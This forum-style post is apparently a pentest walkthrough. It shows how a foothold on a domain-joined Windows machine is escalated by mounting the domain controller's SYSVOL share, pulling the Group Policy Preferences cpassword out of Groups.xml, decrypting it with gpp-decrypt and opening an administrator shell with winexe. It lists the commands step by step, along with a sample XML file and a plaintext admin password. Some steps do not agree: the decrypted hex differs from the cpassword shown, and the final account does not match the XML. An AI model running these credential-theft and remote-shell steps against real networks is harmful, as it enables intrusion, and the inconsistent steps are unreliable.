Lets consider the following assumptions:

1) Some how I gained access to the windows system which in the domain.
2) Maintaining a low privileged user shell on the system

Tools which we used while performing Domain Controller Pentest.

1) GPP-Decrypt - For decryption of the GGP policy password
2) WinExe - Gaining shell access to the domain controller administrator

Lets consider I got the limited shell access to the windows system by using vulnerable software, web application vulnerability or client side attack. I started recon on the system by using my limited shell. The very first command I executed :
Code:
echo %LOGONSERVER%
using this command, I got to know, on which domain controller this system authenticated.

The domain controller was :
Code:
\\G4HBABA
So we know the domain controller name, what next! Lets try to find the SYSVOL directory.

For those who don't know about SYSVOL:

Code:
The term SYSVOL refers to a set of files and folders that reside on the local hard disk of each domain controller in a domain and that are replicated by the File Replication service (FRS). Network clients access the contents of the SYSVOL tree by using the NETLOGON and SYSVOL shared folders.
Just simply mount the domain controller using following command:

Code:
net use z: \\G4HBABA\SYSVOL
Next step to find the Groups.xml, where the DC's password maintained.

Code:
>z:
z:>dir /s *.xml
On your have the XML file you can just copy to the desktop

Code:
z:> Copy Groups.xml c:\Users\garage\Desktop\Groups.xml 
z:>c:
To view the XML file use the following command
Code:
c:\Users\garage\Desktop\ > Type Groups.xml
Code:
<?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
     name="ladmin_gpo" image="0" changed="2012-02-03 07:10:48"
     uid="{FE47E73C-7525-46CD-B2E0-F68D3022EDCE}">
      <Properties action="C" fullName="Local admin created by GPO"
       description=""
       cpassword="9QHhFTUdm6rDgu30J7ShZfqt07T6vOUGkyAFG3G7M+5AotJjkOva7E9KSAcamdrruTgly0O/uVTB/UUdLNU4775b5381hyuUzkd4lJW+llcNNNrQlYu7zqH3/i+8jfjhUq9lqPn8VjCtb9iaEqWbKQ"
       changeLogon="0" noChange="0" neverExpires="0"
       acctDisabled="0" userName="ladmin_gpo"/>
    </User>
    <Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}"
     name="Administrators (built-in)" image="2"
     changed="2012-02-06 10:45:50"
     uid="{4D0CE71D-D2E4-42B1-9BF3-147C910A15F1}">
    </Group>
  </Groups>
As you find the encrypted password in the XML, the password contains in the cpassword. To decrypt the password, you can use the utility called as gpp-decrypt

Code:
>gpp-decrypt 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
Alright lets try to connect to the DC.

Code:
 >winexe -U HOME/Administrator%h4ppyxm455!! //IPHOST "cmd"
Once you execute the above command, existing privileges will Elevate.